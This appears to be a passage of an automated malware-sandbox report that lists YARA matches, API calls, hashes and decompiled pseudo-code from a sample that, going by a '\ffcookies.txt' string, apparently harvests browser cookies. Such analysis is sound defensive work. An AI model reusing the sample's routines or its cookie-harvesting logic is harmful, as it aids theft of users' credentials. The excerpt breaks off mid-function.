                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocByteCharLocalMultiWide
                                                                                                                                                                        • String ID: 76426c3f362f5a47a469f0e9d8bc3eef
                                                                                                                                                                        • API String ID: 3282395022-820280900
                                                                                                                                                                        • Opcode ID: 620967e8831f66a80d015b3e32f1d5a571271f4666585bf4ea6a08314ec2853b
                                                                                                                                                                        • Instruction ID: 821f2f2a5b45e58665a0b52f3e5465d9484d76db546a2d81d506fa24111d9f92
                                                                                                                                                                        • Opcode Fuzzy Hash: 620967e8831f66a80d015b3e32f1d5a571271f4666585bf4ea6a08314ec2853b
                                                                                                                                                                        • Instruction Fuzzy Hash: 88E0D8713001207FE21057AA9C84FA76AE8DBC9770F140536F318E72B0D9B01C1083B5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: QQ
                                                                                                                                                                        • API String ID: 0-3460843698
                                                                                                                                                                        • Opcode ID: f473cefecd5df86fe97d96c8c56a9dbe05cfdfb6797da776bccff34878467c9c
                                                                                                                                                                        • Instruction ID: 35e6eb4f20574c1da3e2a9a82b2d582b64595e55fb0d9e4c6343fd8c0ced53de
                                                                                                                                                                        • Opcode Fuzzy Hash: f473cefecd5df86fe97d96c8c56a9dbe05cfdfb6797da776bccff34878467c9c
                                                                                                                                                                        • Instruction Fuzzy Hash: 880119B5A0150DEBDB04CF54D940BEF73B4AB88384F10855AFC298B340D3B8EA91DB99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006DC753
                                                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 006DC773
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.462192627.00000000006D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 006D8000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_6d8000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                        • Instruction ID: d04fb1dba249695c1c1d091aa4b9a655fdb232c5982519ad4b28da037db25f73
                                                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                        • Instruction Fuzzy Hash: E0F0623290071A6BD7202BF998CDEAA76EDAF49735F10062AE646D12C0DB70EC458A61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ___crtExitProcess.LIBCMTD ref: 00424375
                                                                                                                                                                          • Part of subcall function 0041D740: ___crtCorExitProcess.LIBCMTD ref: 0041D749
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(0045F044,00000000,00000001), ref: 004243A8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExitProcess___crt$AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 215841669-0
                                                                                                                                                                        • Opcode ID: fd577c789abfe75a794f6c840ab4e926d32faf681ac1f8a682a6a37b6ce83210
                                                                                                                                                                        • Instruction ID: c68fea34626bc608a6216b9c412624a9537ea85e6661c0bdf65d2760b835db09
                                                                                                                                                                        • Opcode Fuzzy Hash: fd577c789abfe75a794f6c840ab4e926d32faf681ac1f8a682a6a37b6ce83210
                                                                                                                                                                        • Instruction Fuzzy Hash: 7BE09274B00214ABDB14DF90F84A7AE3720EB80309F04413AEE060A292E2799985C78B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                        			E00408619(void* __ecx) {
                                                                                                                                                                        				WCHAR* _v8;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t8;
                                                                                                                                                                        				int _t9;
                                                                                                                                                                        				void* _t12;
                                                                                                                                                                        				void* _t23;
                                                                                                                                                                        				void* _t37;
                                                                                                                                                                        				void* _t39;
                                                                                                                                                                        				void* _t41;
                                                                                                                                                                        
                                                                                                                                                                        				_t8 = LocalAlloc(0x40, 0xff78); // executed
                                                                                                                                                                        				L1(); // executed
                                                                                                                                                                        				L1(); // executed
                                                                                                                                                                        				_t23 = _t8;
                                                                                                                                                                        				_t39 = _t37;
                                                                                                                                                                        				_push(_t23);
                                                                                                                                                                        				_push(_t39);
                                                                                                                                                                        				_t18 = L"\r\n\r\n";
                                                                                                                                                                        				_v8 = _t23;
                                                                                                                                                                        				_t9 = lstrlenW(L"\r\n\r\n");
                                                                                                                                                                        				_t3 = lstrlenW(_v8) + 0x80; // 0x80
                                                                                                                                                                        				_t35 = _t3 + _t9;
                                                                                                                                                                        				_t12 = LocalAlloc(0x40, _t3 + _t9 + _t3 + _t9); // executed
                                                                                                                                                                        				_t41 = _t12;
                                                                                                                                                                        				E0040185F(_t41, _t35, _v8);
                                                                                                                                                                        				E0040188C(L"\r\n\r\n", _t41, _t35, _t41, _t18);
                                                                                                                                                                        				GlobalFree(_v8); // executed
                                                                                                                                                                        				return _t41;
                                                                                                                                                                        			}













                                                                                                                                                                        0x00408628
                                                                                                                                                                        0x0040862e
                                                                                                                                                                        0x0040863a
                                                                                                                                                                        0x00408644
                                                                                                                                                                        0x00408646
                                                                                                                                                                        0x0040a506
                                                                                                                                                                        0x0040a508
                                                                                                                                                                        0x0040a510
                                                                                                                                                                        0x0040a513
                                                                                                                                                                        0x0040a516
                                                                                                                                                                        0x0040a525
                                                                                                                                                                        0x0040a52b
                                                                                                                                                                        0x0040a533
                                                                                                                                                                        0x0040a538
                                                                                                                                                                        0x0040a53e
                                                                                                                                                                        0x0040a548
                                                                                                                                                                        0x0040a550
                                                                                                                                                                        0x0040a55c

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0000FF78,00000000,00407870), ref: 00408628
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocLocallstrlen$FreeGlobal
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 937752025-2344752452
                                                                                                                                                                        • Opcode ID: bc3759315248a3d9f8ef3571398d1fb34b5d9d99f7b2929ac23ffadec65b976f
                                                                                                                                                                        • Instruction ID: d28f653e51836c90490366c206293b127019c736856f4bca57a512f3e5c56564
                                                                                                                                                                        • Opcode Fuzzy Hash: bc3759315248a3d9f8ef3571398d1fb34b5d9d99f7b2929ac23ffadec65b976f
                                                                                                                                                                        • Instruction Fuzzy Hash: 03D0A720F4831067CF14BAB54C15F2E22929B84320B20883A6205BF3C4CABCDC1183CD
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 16%
                                                                                                                                                                        			E0040A16F(void* __ecx, void* __edx, intOrPtr* _a8) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                        				short _t13;
                                                                                                                                                                        				void* _t16;
                                                                                                                                                                        				signed int _t17;
                                                                                                                                                                        				void* _t18;
                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        				void* _t26;
                                                                                                                                                                        				void* _t29;
                                                                                                                                                                        				signed int _t34;
                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                        				void* _t37;
                                                                                                                                                                        				void* _t40;
                                                                                                                                                                        				void* _t41;
                                                                                                                                                                        				signed short* _t43;
                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                        
                                                                                                                                                                        				_t26 = __edx;
                                                                                                                                                                        				_t12 =  *((intOrPtr*)( *0x40e18c))(__ecx, __edx, _t37, _t25, __ecx);
                                                                                                                                                                        				_v8 = _t12;
                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                        					_t13 = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t16 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(__ecx, _t41) + _t14); // executed
                                                                                                                                                                        					_t40 = _t16;
                                                                                                                                                                        					_t17 =  *((intOrPtr*)( *0x40e08c))(_t26);
                                                                                                                                                                        					_t36 = 0;
                                                                                                                                                                        					_t43 = _v8 + _t17 * 2;
                                                                                                                                                                        					_t34 =  *_t43 & 0x0000ffff;
                                                                                                                                                                        					_t18 = 0x22;
                                                                                                                                                                        					if(_t34 != _t18) {
                                                                                                                                                                        						_t24 = 0;
                                                                                                                                                                        						_t29 = 0x22;
                                                                                                                                                                        						do {
                                                                                                                                                                        							_t36 = _t36 + 1;
                                                                                                                                                                        							 *(_t24 + _t40) = _t34;
                                                                                                                                                                        							_t24 = _t36 + _t36;
                                                                                                                                                                        							_t34 =  *(_t24 + _t43) & 0x0000ffff;
                                                                                                                                                                        						} while (_t34 != _t29);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t44 = _a8;
                                                                                                                                                                        					 *((short*)(_t40 + _t36 * 2)) = 0;
                                                                                                                                                                        					 *_t44 =  *((intOrPtr*)( *0x40e13c))( *_t44, _t40); // executed
                                                                                                                                                                        					LocalFree(_t40); // executed
                                                                                                                                                                        					_t13 = 1;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t13;
                                                                                                                                                                        			}




















                                                                                                                                                                        0x0040a17a
                                                                                                                                                                        0x0040a180
                                                                                                                                                                        0x0040a182
                                                                                                                                                                        0x0040a187
                                                                                                                                                                        0x0040a1f8
                                                                                                                                                                        0x0040a189
                                                                                                                                                                        0x0040a19e
                                                                                                                                                                        0x0040a1a6
                                                                                                                                                                        0x0040a1a9
                                                                                                                                                                        0x0040a1ae
                                                                                                                                                                        0x0040a1b2
                                                                                                                                                                        0x0040a1b5
                                                                                                                                                                        0x0040a1b8
                                                                                                                                                                        0x0040a1be
                                                                                                                                                                        0x0040a1c2
                                                                                                                                                                        0x0040a1c4
                                                                                                                                                                        0x0040a1c5
                                                                                                                                                                        0x0040a1c5
                                                                                                                                                                        0x0040a1c6
                                                                                                                                                                        0x0040a1ca
                                                                                                                                                                        0x0040a1cd
                                                                                                                                                                        0x0040a1d1
                                                                                                                                                                        0x0040a1c5
                                                                                                                                                                        0x0040a1d6
                                                                                                                                                                        0x0040a1dc
                                                                                                                                                                        0x0040a1ea
                                                                                                                                                                        0x0040a1ec
                                                                                                                                                                        0x0040a1f4
                                                                                                                                                                        0x0040a1f5
                                                                                                                                                                        0x0040a1fd

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00401D77,?,?), ref: 0040A19E
                                                                                                                                                                        • LocalFree.KERNELBASE(00000000,?,00401D77,?,?), ref: 0040A1EC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2012307162-0
                                                                                                                                                                        • Opcode ID: a4121b4af304f9e425f871450021feb797f2bc1189384325bfc8c16f67230c56
                                                                                                                                                                        • Instruction ID: 58c5dcfe122550f1dd4d580a845b1fe98dc3c348f2ec0a40c79b731157ff0f5b
                                                                                                                                                                        • Opcode Fuzzy Hash: a4121b4af304f9e425f871450021feb797f2bc1189384325bfc8c16f67230c56
                                                                                                                                                                        • Instruction Fuzzy Hash: E811E572210111AFE704DFAADD8097AB3FDEF89710B50483AE581EB2A0EAB49C118725
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __nh_malloc_dbg.LIBCMTD ref: 0041FB3B
                                                                                                                                                                          • Part of subcall function 00415840: __calloc_dbg_impl.LIBCMTD ref: 00415867
                                                                                                                                                                          • Part of subcall function 00415840: __errno.LIBCMTD ref: 0041587E
                                                                                                                                                                          • Part of subcall function 00415840: __errno.LIBCMTD ref: 00415887
                                                                                                                                                                        • __nh_malloc_dbg.LIBCMTD ref: 0041FC67
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __errno__nh_malloc_dbg$__calloc_dbg_impl
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2503616996-0
                                                                                                                                                                        • Opcode ID: 4038e884bfdae926c20c9a15fb021c6f46d336c8b207d7308693c02cbaf8b1c3
                                                                                                                                                                        • Instruction ID: 85d9ec527e6cbaaf126460574926a2b9f3ef66150f98be4b475bbf6d45bffd36
                                                                                                                                                                        • Opcode Fuzzy Hash: 4038e884bfdae926c20c9a15fb021c6f46d336c8b207d7308693c02cbaf8b1c3
                                                                                                                                                                        • Instruction Fuzzy Hash: 34E0D871E48704DAD7309A559C027987720E740734F60432FE535261C1D67914068E19
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __encode_pointer.LIBCMTD ref: 0041B707
                                                                                                                                                                          • Part of subcall function 0041B630: __crt_wait_module_handle.LIBCMTD ref: 0041B67C
                                                                                                                                                                          • Part of subcall function 0041B630: RtlEncodePointer.NTDLL(?), ref: 0041B6B7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EncodePointer__crt_wait_module_handle__encode_pointer
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2010845264-0
                                                                                                                                                                        • Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                                                                                                                                                                        • Instruction ID: e1cb89af54fb0291e7bf1286e9e6485c2d4d8aea64d1d4d7b257b16ee444ded5
                                                                                                                                                                        • Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                                                                                                                                                                        • Instruction Fuzzy Hash: 69A0127244430C23D00020833807B02350C83D0638F080021F50C051422842A45540D7
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E00408FA5(void* __ecx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				char _v604;
                                                                                                                                                                        				intOrPtr* _t19;
                                                                                                                                                                        				void* _t20;
                                                                                                                                                                        				intOrPtr* _t34;
                                                                                                                                                                        				intOrPtr* _t36;
                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                        				intOrPtr* _t41;
                                                                                                                                                                        				intOrPtr* _t43;
                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                        				intOrPtr* _t48;
                                                                                                                                                                        				void* _t52;
                                                                                                                                                                        				void* _t53;
                                                                                                                                                                        
                                                                                                                                                                        				_t19 =  *0x40e190; // 0x7632b690
                                                                                                                                                                        				_t53 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				_t20 =  *_t19(0x40c030, 0, 1, 0x40c010,  &_v8); // executed
                                                                                                                                                                        				if(_t20 < 0) {
                                                                                                                                                                        					L3:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t40 = _v8;
                                                                                                                                                                        				_push( &_v12);
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				_push(0x40c020);
                                                                                                                                                                        				_push(_t40);
                                                                                                                                                                        				if( *((intOrPtr*)( *_t40))() >= 0) {
                                                                                                                                                                        					_t41 = _v12;
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push(_t41);
                                                                                                                                                                        					if( *((intOrPtr*)( *_t41 + 0x14))() >= 0) {
                                                                                                                                                                        						_t52 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        						if(_t52 == 0) {
                                                                                                                                                                        							goto L3;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t48 = _v8;
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push( &_v604);
                                                                                                                                                                        						_push(0x104);
                                                                                                                                                                        						_push(_t52);
                                                                                                                                                                        						_push(_t48); // executed
                                                                                                                                                                        						if( *((intOrPtr*)( *_t48 + 0xc))() >= 0) {
                                                                                                                                                                        							_t53 = _t52;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							LocalFree(_t52);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t43 = _v12;
                                                                                                                                                                        						 *((intOrPtr*)( *_t43 + 8))(_t43);
                                                                                                                                                                        						_t44 = _v8;
                                                                                                                                                                        						 *((intOrPtr*)( *_t44 + 8))(_t44);
                                                                                                                                                                        						return _t53;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t34 = _v12;
                                                                                                                                                                        					 *((intOrPtr*)( *_t34 + 8))(_t34);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t36 = _v8;
                                                                                                                                                                        				 *((intOrPtr*)( *_t36 + 8))(_t36);
                                                                                                                                                                        				goto L3;
                                                                                                                                                                        			}

















                                                                                                                                                                        0x00408fae
                                                                                                                                                                        0x00408fb7
                                                                                                                                                                        0x00408fbc
                                                                                                                                                                        0x00408fcd
                                                                                                                                                                        0x00408fd1
                                                                                                                                                                        0x00408ff4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00408ff4
                                                                                                                                                                        0x00408fd3
                                                                                                                                                                        0x00408fd9
                                                                                                                                                                        0x00408fda
                                                                                                                                                                        0x00408fdd
                                                                                                                                                                        0x00408fe4
                                                                                                                                                                        0x00408fe9
                                                                                                                                                                        0x00408ffa
                                                                                                                                                                        0x00408ffd
                                                                                                                                                                        0x00408fff
                                                                                                                                                                        0x00409007
                                                                                                                                                                        0x00409022
                                                                                                                                                                        0x00409026
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409028
                                                                                                                                                                        0x00409031
                                                                                                                                                                        0x00409032
                                                                                                                                                                        0x00409033
                                                                                                                                                                        0x0040903a
                                                                                                                                                                        0x0040903b
                                                                                                                                                                        0x00409041
                                                                                                                                                                        0x0040904c
                                                                                                                                                                        0x00409043
                                                                                                                                                                        0x00409044
                                                                                                                                                                        0x00409044
                                                                                                                                                                        0x0040904e
                                                                                                                                                                        0x00409054
                                                                                                                                                                        0x00409057
                                                                                                                                                                        0x0040905d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00409060
                                                                                                                                                                        0x00409009
                                                                                                                                                                        0x0040900f
                                                                                                                                                                        0x0040900f
                                                                                                                                                                        0x00408feb
                                                                                                                                                                        0x00408ff1
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00409044
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeLocal
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2826327444-0
                                                                                                                                                                        • Opcode ID: 38dd199c4f0c121f0ad27b3cccfc0052999ba1917e57d09d5119ecbd186de782
                                                                                                                                                                        • Instruction ID: ef33778294753aa54e7f7d2c5df33d66e96767dbe31cdff2da17f2a52da10caf
                                                                                                                                                                        • Opcode Fuzzy Hash: 38dd199c4f0c121f0ad27b3cccfc0052999ba1917e57d09d5119ecbd186de782
                                                                                                                                                                        • Instruction Fuzzy Hash: DD21B071700115EBC714CBA9CD88E9FBBB9EF89704B2001ADF109EB291DA75ED41DB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 006DC43B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.462192627.00000000006D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 006D8000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_6d8000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                        • Instruction ID: afaae270a4c21c56169746a73ee428bfdfea60aff84b1ab76a1f30e5224b772f
                                                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                        • Instruction Fuzzy Hash: F8113C79A00208EFDB01DF98C985E99BBF5AF08350F05C095F9489B362D371EA50EF80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • StrCpyW.SHLWAPI(00000000,00000000), ref: 0040674F
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,0000002E), ref: 004067B9
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 00406895
                                                                                                                                                                        • lstrlenW.KERNEL32(00000010), ref: 004068A0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$AllocCombineFreeGlobalLocalPath
                                                                                                                                                                        • String ID: .$8\m$\ffcookies.txt$xZm$x[m
                                                                                                                                                                        • API String ID: 3891494632-3454305175
                                                                                                                                                                        • Opcode ID: 879cdd130a76642c1f8c34f2d893b4faa5a20bcdfa89c983fccbb66d58194033
                                                                                                                                                                        • Instruction ID: 20c570a6cb6be533e63ae3ac294d5736f0af275dc5b24bb95add0a5715bb0c19
                                                                                                                                                                        • Opcode Fuzzy Hash: 879cdd130a76642c1f8c34f2d893b4faa5a20bcdfa89c983fccbb66d58194033
                                                                                                                                                                        • Instruction Fuzzy Hash: D9C16FB1E00219AFDB04DFA6DD44AAEBBB5EB88310F104839F915B7391DB745D11CBA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E004039D7(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				void* _v52;
                                                                                                                                                                        				void* _v56;
                                                                                                                                                                        				char _v608;
                                                                                                                                                                        				signed char _v652;
                                                                                                                                                                        				void* _t47;
                                                                                                                                                                        				void* _t50;
                                                                                                                                                                        				void* _t57;
                                                                                                                                                                        				void* _t60;
                                                                                                                                                                        				void* _t68;
                                                                                                                                                                        				void* _t70;
                                                                                                                                                                        				void* _t71;
                                                                                                                                                                        				void* _t72;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				void* _t76;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				void* _t80;
                                                                                                                                                                        				intOrPtr _t81;
                                                                                                                                                                        				intOrPtr _t84;
                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                        				void* _t102;
                                                                                                                                                                        				intOrPtr _t129;
                                                                                                                                                                        				intOrPtr _t132;
                                                                                                                                                                        				intOrPtr _t133;
                                                                                                                                                                        				intOrPtr _t135;
                                                                                                                                                                        				intOrPtr _t137;
                                                                                                                                                                        				intOrPtr _t139;
                                                                                                                                                                        				void* _t143;
                                                                                                                                                                        				DWORD* _t144;
                                                                                                                                                                        				void* _t145;
                                                                                                                                                                        				void* _t149;
                                                                                                                                                                        
                                                                                                                                                                        				_t101 = __ecx;
                                                                                                                                                                        				_v24 = __edx;
                                                                                                                                                                        				_v40 = __ecx;
                                                                                                                                                                        				_t47 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), __ecx);
                                                                                                                                                                        				_t129 =  *0x40e1d0; // 0x6d5c38
                                                                                                                                                                        				_t143 = E0040A503(_t47, _t129);
                                                                                                                                                                        				_v20 = _t143;
                                                                                                                                                                        				_t50 =  *((intOrPtr*)( *0x40e018))(_t143,  &_v652);
                                                                                                                                                                        				_v16 = _t50;
                                                                                                                                                                        				if(_t50 != 0xffffffff) {
                                                                                                                                                                        					_t144 = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						if((_v652 & 0x00000010) != 0) {
                                                                                                                                                                        							goto L11;
                                                                                                                                                                        						} else {
